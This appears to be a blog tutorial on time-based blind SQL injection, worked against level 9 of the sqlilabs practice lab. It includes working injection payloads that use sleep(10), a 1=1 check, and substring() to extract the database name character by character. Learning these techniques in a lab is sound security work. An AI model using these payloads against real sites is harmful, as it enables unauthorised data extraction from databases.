SQL Injection 4

Time to move on to time-based SQLi.


Time based SQLi

The process is almost the same as boolean-based. The thing that changes is the way to identify a true condition. Let’s visit level 9 of sqlilabs.

The way to identify a true condition is using the function sleep:
True) and sleep(10)

Let’s verify that it works properly:' and sleep(10) --+

And the web page takes 10 seconds to load:


And now we perform the first query, if 1=1 it would wait 10 seconds:' and sleep(10) and 1=1 --+

Next step is to extract useful information:' and sleep(10) and database()='security' --+

And the way to extract the database name, or anything that we need is using again the substring function.' and sleep(10) and substring(database(),1,1)='s' --+

This entry was posted in Hacking Web and tagged , , , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *